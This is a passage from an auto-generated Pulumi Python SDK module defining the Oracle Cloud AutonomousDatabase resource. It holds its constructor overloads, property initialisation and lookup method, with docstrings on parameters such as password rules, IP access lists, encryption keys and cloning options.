pulumi.set(self, "whitelisted_ips", value)
class AutonomousDatabase(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_password: Optional[pulumi.Input[str]] = None,
are_primary_whitelisted_ips_used: Optional[pulumi.Input[bool]] = None,
autonomous_container_database_id: Optional[pulumi.Input[str]] = None,
autonomous_database_backup_id: Optional[pulumi.Input[str]] = None,
autonomous_database_id: Optional[pulumi.Input[str]] = None,
autonomous_maintenance_schedule_type: Optional[pulumi.Input[str]] = None,
clone_type: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
customer_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseCustomerContactArgs']]]]] = None,
data_safe_status: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
db_name: Optional[pulumi.Input[str]] = None,
db_version: Optional[pulumi.Input[str]] = None,
db_workload: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_access_control_enabled: Optional[pulumi.Input[bool]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_data_guard_enabled: Optional[pulumi.Input[bool]] = None,
is_dedicated: Optional[pulumi.Input[bool]] = None,
is_free_tier: Optional[pulumi.Input[bool]] = None,
is_preview_version_with_service_terms_accepted: Optional[pulumi.Input[bool]] = None,
is_refreshable_clone: Optional[pulumi.Input[bool]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
license_model: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ocpu_count: Optional[pulumi.Input[float]] = None,
open_mode: Optional[pulumi.Input[str]] = None,
operations_insights_status: Optional[pulumi.Input[str]] = None,
permission_level: Optional[pulumi.Input[str]] = None,
private_endpoint_label: Optional[pulumi.Input[str]] = None,
refreshable_mode: Optional[pulumi.Input[str]] = None,
rotate_key_trigger: Optional[pulumi.Input[bool]] = None,
source: Optional[pulumi.Input[str]] = None,
source_id: Optional[pulumi.Input[str]] = None,
standby_whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
switchover_to: Optional[pulumi.Input[str]] = None,
timestamp: Optional[pulumi.Input[str]] = None,
vault_id: Optional[pulumi.Input[str]] = None,
whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
This resource provides the Autonomous Database resource in Oracle Cloud Infrastructure Database service.
Creates a new Autonomous Database.
## Import
AutonomousDatabases can be imported using the `id`, e.g.
```sh
$ pulumi import oci:database/autonomousDatabase:AutonomousDatabase test_autonomous_database "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] admin_password: (Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
:param pulumi.Input[bool] are_primary_whitelisted_ips_used: (Updatable) This field will be null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. It's value would be `TRUE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses primary IP access control list (ACL) for standby. It's value would be `FALSE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses different IP access control list (ACL) for standby compared to primary.
:param pulumi.Input[str] autonomous_container_database_id: The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[str] autonomous_database_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_database_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_maintenance_schedule_type: The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule of this Autonomous Database follows a schedule that applies patches prior to the REGULAR schedule.The REGULAR maintenance schedule of this Autonomous Database follows the normal cycle.
:param pulumi.Input[str] clone_type: The Autonomous Database clone type.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
:param pulumi.Input[int] cpu_core_count: (Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseCustomerContactArgs']]]] customer_contacts: (Updatable) Customer Contacts.
:param pulumi.Input[str] data_safe_status: (Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
:param pulumi.Input[int] data_storage_size_in_gb: (Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[int] data_storage_size_in_tbs: (Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[str] db_name: The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
:param pulumi.Input[str] db_version: (Updatable) A valid Oracle Database version for Autonomous Database.`db_workload` AJD and APEX are only supported for `db_version` `19c` and above.
:param pulumi.Input[str] db_workload: (Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. *Note: `db_workload` can only be updated from AJD to OLTP or from a free OLTP to AJD.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[bool] is_access_control_enabled: (Updatable) Indicates if the database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or edit option in console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control will be disabled for the clone.
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
:param pulumi.Input[bool] is_data_guard_enabled: (Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
:param pulumi.Input[bool] is_dedicated: True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
:param pulumi.Input[bool] is_free_tier: (Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
:param pulumi.Input[bool] is_preview_version_with_service_terms_accepted: If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
:param pulumi.Input[bool] is_refreshable_clone: (Updatable) True for creating a refreshable clone and False for detaching the clone from source Autonomous Database. Detaching is one time operation and clone becomes a regular Autonomous Database.
:param pulumi.Input[str] kms_key_id: The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will supply the value of `BRING_YOUR_OWN_LICENSE`. It is a required field when `db_workload` is AJD and needs to be set to `LICENSE_INCLUDED` as AJD does not support default `license_model` value `BRING_YOUR_OWN_LICENSE`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
:param pulumi.Input[float] ocpu_count: (Updatable) The number of OCPU cores to be made available to the database.
:param pulumi.Input[str] open_mode: The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
:param pulumi.Input[str] operations_insights_status: Status of Operations Insights for this Autonomous Database.
:param pulumi.Input[str] permission_level: The Autonomous Database permission level. Restricted mode allows access only to admin users.
:param pulumi.Input[str] private_endpoint_label: (Updatable) The private endpoint label for the resource.
:param pulumi.Input[str] refreshable_mode: (Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
:param pulumi.Input[bool] rotate_key_trigger: (Updatable) An optional property when flipped triggers rotation of KMS key. It is only applicable on dedicated databases i.e. where `is_dedicated` is true.
:param pulumi.Input[str] source: The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
:param pulumi.Input[str] source_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[Sequence[pulumi.Input[str]]] standby_whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
:param pulumi.Input[str] state: (Updatable) The current state of the Autonomous Database. Could be set to AVAILABLE or STOPPED
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
:param pulumi.Input[str] switchover_to: It is applicable only when `is_data_guard_enabled` is true. Could be set to `PRIMARY` or `STANDBY`. Default value is `PRIMARY`.
:param pulumi.Input[str] timestamp: The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
:param pulumi.Input[str] vault_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: AutonomousDatabaseArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Autonomous Database resource in Oracle Cloud Infrastructure Database service.
Creates a new Autonomous Database.
## Import
AutonomousDatabases can be imported using the `id`, e.g.
```sh
$ pulumi import oci:database/autonomousDatabase:AutonomousDatabase test_autonomous_database "id"
```
:param str resource_name: The name of the resource.
:param AutonomousDatabaseArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(AutonomousDatabaseArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_password: Optional[pulumi.Input[str]] = None,
are_primary_whitelisted_ips_used: Optional[pulumi.Input[bool]] = None,
autonomous_container_database_id: Optional[pulumi.Input[str]] = None,
autonomous_database_backup_id: Optional[pulumi.Input[str]] = None,
autonomous_database_id: Optional[pulumi.Input[str]] = None,
autonomous_maintenance_schedule_type: Optional[pulumi.Input[str]] = None,
clone_type: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
customer_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseCustomerContactArgs']]]]] = None,
data_safe_status: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
db_name: Optional[pulumi.Input[str]] = None,
db_version: Optional[pulumi.Input[str]] = None,
db_workload: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
is_access_control_enabled: Optional[pulumi.Input[bool]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_data_guard_enabled: Optional[pulumi.Input[bool]] = None,
is_dedicated: Optional[pulumi.Input[bool]] = None,
is_free_tier: Optional[pulumi.Input[bool]] = None,
is_preview_version_with_service_terms_accepted: Optional[pulumi.Input[bool]] = None,
is_refreshable_clone: Optional[pulumi.Input[bool]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
license_model: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ocpu_count: Optional[pulumi.Input[float]] = None,
open_mode: Optional[pulumi.Input[str]] = None,
operations_insights_status: Optional[pulumi.Input[str]] = None,
permission_level: Optional[pulumi.Input[str]] = None,
private_endpoint_label: Optional[pulumi.Input[str]] = None,
refreshable_mode: Optional[pulumi.Input[str]] = None,
rotate_key_trigger: Optional[pulumi.Input[bool]] = None,
source: Optional[pulumi.Input[str]] = None,
source_id: Optional[pulumi.Input[str]] = None,
standby_whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
switchover_to: Optional[pulumi.Input[str]] = None,
timestamp: Optional[pulumi.Input[str]] = None,
vault_id: Optional[pulumi.Input[str]] = None,
whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = AutonomousDatabaseArgs.__new__(AutonomousDatabaseArgs)
__props__.__dict__["admin_password"] = admin_password
__props__.__dict__["are_primary_whitelisted_ips_used"] = are_primary_whitelisted_ips_used
__props__.__dict__["autonomous_container_database_id"] = autonomous_container_database_id
__props__.__dict__["autonomous_database_backup_id"] = autonomous_database_backup_id
__props__.__dict__["autonomous_database_id"] = autonomous_database_id
__props__.__dict__["autonomous_maintenance_schedule_type"] = autonomous_maintenance_schedule_type
__props__.__dict__["clone_type"] = clone_type
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["cpu_core_count"] = cpu_core_count
__props__.__dict__["customer_contacts"] = customer_contacts
__props__.__dict__["data_safe_status"] = data_safe_status
__props__.__dict__["data_storage_size_in_gb"] = data_storage_size_in_gb
__props__.__dict__["data_storage_size_in_tbs"] = data_storage_size_in_tbs
if db_name is None and not opts.urn:
raise TypeError("Missing required property 'db_name'")
__props__.__dict__["db_name"] = db_name
__props__.__dict__["db_version"] = db_version
__props__.__dict__["db_workload"] = db_workload
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["is_access_control_enabled"] = is_access_control_enabled
__props__.__dict__["is_auto_scaling_enabled"] = is_auto_scaling_enabled
__props__.__dict__["is_data_guard_enabled"] = is_data_guard_enabled
__props__.__dict__["is_dedicated"] = is_dedicated
__props__.__dict__["is_free_tier"] = is_free_tier
__props__.__dict__["is_preview_version_with_service_terms_accepted"] = is_preview_version_with_service_terms_accepted
__props__.__dict__["is_refreshable_clone"] = is_refreshable_clone
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["license_model"] = license_model
__props__.__dict__["nsg_ids"] = nsg_ids
__props__.__dict__["ocpu_count"] = ocpu_count
__props__.__dict__["open_mode"] = open_mode
__props__.__dict__["operations_insights_status"] = operations_insights_status
__props__.__dict__["permission_level"] = permission_level
__props__.__dict__["private_endpoint_label"] = private_endpoint_label
__props__.__dict__["refreshable_mode"] = refreshable_mode
__props__.__dict__["rotate_key_trigger"] = rotate_key_trigger
__props__.__dict__["source"] = source
__props__.__dict__["source_id"] = source_id
__props__.__dict__["standby_whitelisted_ips"] = standby_whitelisted_ips
__props__.__dict__["state"] = state
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["switchover_to"] = switchover_to
__props__.__dict__["timestamp"] = timestamp
__props__.__dict__["vault_id"] = vault_id
__props__.__dict__["whitelisted_ips"] = whitelisted_ips
__props__.__dict__["apex_details"] = None
__props__.__dict__["available_upgrade_versions"] = None
__props__.__dict__["backup_config"] = None
__props__.__dict__["connection_strings"] = None
__props__.__dict__["connection_urls"] = None
__props__.__dict__["failed_data_recovery_in_seconds"] = None
__props__.__dict__["infrastructure_type"] = None
__props__.__dict__["is_preview"] = None
__props__.__dict__["key_history_entries"] = None
__props__.__dict__["key_store_id"] = None
__props__.__dict__["key_store_wallet_name"] = None
__props__.__dict__["kms_key_lifecycle_details"] = None
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["private_endpoint"] = None
__props__.__dict__["private_endpoint_ip"] = None
__props__.__dict__["refreshable_status"] = None
__props__.__dict__["role"] = None
__props__.__dict__["service_console_url"] = None
__props__.__dict__["standby_db"] = None
__props__.__dict__["system_tags"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_deletion_of_free_autonomous_database"] = None
__props__.__dict__["time_maintenance_begin"] = None
__props__.__dict__["time_maintenance_end"] = None
__props__.__dict__["time_of_last_failover"] = None
__props__.__dict__["time_of_last_refresh"] = None
__props__.__dict__["time_of_last_refresh_point"] = None
__props__.__dict__["time_of_last_switchover"] = None
__props__.__dict__["time_of_next_refresh"] = None
__props__.__dict__["time_reclamation_of_free_autonomous_database"] = None
__props__.__dict__["used_data_storage_size_in_tbs"] = None
super(AutonomousDatabase, __self__).__init__(
'oci:database/autonomousDatabase:AutonomousDatabase',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
admin_password: Optional[pulumi.Input[str]] = None,
apex_details: Optional[pulumi.Input[pulumi.InputType['AutonomousDatabaseApexDetailsArgs']]] = None,
are_primary_whitelisted_ips_used: Optional[pulumi.Input[bool]] = None,
autonomous_container_database_id: Optional[pulumi.Input[str]] = None,
autonomous_database_backup_id: Optional[pulumi.Input[str]] = None,
autonomous_database_id: Optional[pulumi.Input[str]] = None,
autonomous_maintenance_schedule_type: Optional[pulumi.Input[str]] = None,
available_upgrade_versions: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
backup_config: Optional[pulumi.Input[pulumi.InputType['AutonomousDatabaseBackupConfigArgs']]] = None,
clone_type: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
connection_strings: Optional[pulumi.Input[pulumi.InputType['AutonomousDatabaseConnectionStringsArgs']]] = None,
connection_urls: Optional[pulumi.Input[pulumi.InputType['AutonomousDatabaseConnectionUrlsArgs']]] = None,
cpu_core_count: Optional[pulumi.Input[int]] = None,
customer_contacts: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseCustomerContactArgs']]]]] = None,
data_safe_status: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
db_name: Optional[pulumi.Input[str]] = None,
db_version: Optional[pulumi.Input[str]] = None,
db_workload: Optional[pulumi.Input[str]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
display_name: Optional[pulumi.Input[str]] = None,
failed_data_recovery_in_seconds: Optional[pulumi.Input[int]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
infrastructure_type: Optional[pulumi.Input[str]] = None,
is_access_control_enabled: Optional[pulumi.Input[bool]] = None,
is_auto_scaling_enabled: Optional[pulumi.Input[bool]] = None,
is_data_guard_enabled: Optional[pulumi.Input[bool]] = None,
is_dedicated: Optional[pulumi.Input[bool]] = None,
is_free_tier: Optional[pulumi.Input[bool]] = None,
is_preview: Optional[pulumi.Input[bool]] = None,
is_preview_version_with_service_terms_accepted: Optional[pulumi.Input[bool]] = None,
is_refreshable_clone: Optional[pulumi.Input[bool]] = None,
key_history_entries: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseKeyHistoryEntryArgs']]]]] = None,
key_store_id: Optional[pulumi.Input[str]] = None,
key_store_wallet_name: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
kms_key_lifecycle_details: Optional[pulumi.Input[str]] = None,
license_model: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
nsg_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
ocpu_count: Optional[pulumi.Input[float]] = None,
open_mode: Optional[pulumi.Input[str]] = None,
operations_insights_status: Optional[pulumi.Input[str]] = None,
permission_level: Optional[pulumi.Input[str]] = None,
private_endpoint: Optional[pulumi.Input[str]] = None,
private_endpoint_ip: Optional[pulumi.Input[str]] = None,
private_endpoint_label: Optional[pulumi.Input[str]] = None,
refreshable_mode: Optional[pulumi.Input[str]] = None,
refreshable_status: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
rotate_key_trigger: Optional[pulumi.Input[bool]] = None,
service_console_url: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
source_id: Optional[pulumi.Input[str]] = None,
standby_db: Optional[pulumi.Input[pulumi.InputType['AutonomousDatabaseStandbyDbArgs']]] = None,
standby_whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
switchover_to: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_deletion_of_free_autonomous_database: Optional[pulumi.Input[str]] = None,
time_maintenance_begin: Optional[pulumi.Input[str]] = None,
time_maintenance_end: Optional[pulumi.Input[str]] = None,
time_of_last_failover: Optional[pulumi.Input[str]] = None,
time_of_last_refresh: Optional[pulumi.Input[str]] = None,
time_of_last_refresh_point: Optional[pulumi.Input[str]] = None,
time_of_last_switchover: Optional[pulumi.Input[str]] = None,
time_of_next_refresh: Optional[pulumi.Input[str]] = None,
time_reclamation_of_free_autonomous_database: Optional[pulumi.Input[str]] = None,
timestamp: Optional[pulumi.Input[str]] = None,
used_data_storage_size_in_tbs: Optional[pulumi.Input[int]] = None,
vault_id: Optional[pulumi.Input[str]] = None,
whitelisted_ips: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None) -> 'AutonomousDatabase':
"""
Get an existing AutonomousDatabase resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] admin_password: (Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
:param pulumi.Input[pulumi.InputType['AutonomousDatabaseApexDetailsArgs']] apex_details: Information about Oracle APEX Application Development.
:param pulumi.Input[bool] are_primary_whitelisted_ips_used: (Updatable) This field will be null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. It's value would be `TRUE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses primary IP access control list (ACL) for standby. It's value would be `FALSE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses different IP access control list (ACL) for standby compared to primary.
:param pulumi.Input[str] autonomous_container_database_id: The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
:param pulumi.Input[str] autonomous_database_backup_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_database_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[str] autonomous_maintenance_schedule_type: The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule of this Autonomous Database follows a schedule that applies patches prior to the REGULAR schedule.The REGULAR maintenance schedule of this Autonomous Database follows the normal cycle.
:param pulumi.Input[Sequence[pulumi.Input[str]]] available_upgrade_versions: List of Oracle Database versions available for a database upgrade. If there are no version upgrades available, this list is empty.
:param pulumi.Input[pulumi.InputType['AutonomousDatabaseBackupConfigArgs']] backup_config: Autonomous Database configuration details for storing [manual backups](https://docs.cloud.oracle.com/iaas/Content/Database/Tasks/adbbackingup.htm) in the [Object Storage](https://docs.cloud.oracle.com/iaas/Content/Object/Concepts/objectstorageoverview.htm) service.
:param pulumi.Input[str] clone_type: The Autonomous Database clone type.
:param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
:param pulumi.Input[pulumi.InputType['AutonomousDatabaseConnectionStringsArgs']] connection_strings: The connection string used to connect to the Autonomous Database. The username for the Service Console is ADMIN. Use the password you entered when creating the Autonomous Database for the password value.
:param pulumi.Input[pulumi.InputType['AutonomousDatabaseConnectionUrlsArgs']] connection_urls: The URLs for accessing Oracle Application Express (APEX) and SQL Developer Web with a browser from a Compute instance within your VCN or that has a direct connection to your VCN. Note that these URLs are provided by the console only for databases on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm). Example: `{"sqlDevWebUrl": "https://<hostname>/ords...", "apexUrl", "https://<hostname>/ords..."}`
:param pulumi.Input[int] cpu_core_count: (Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
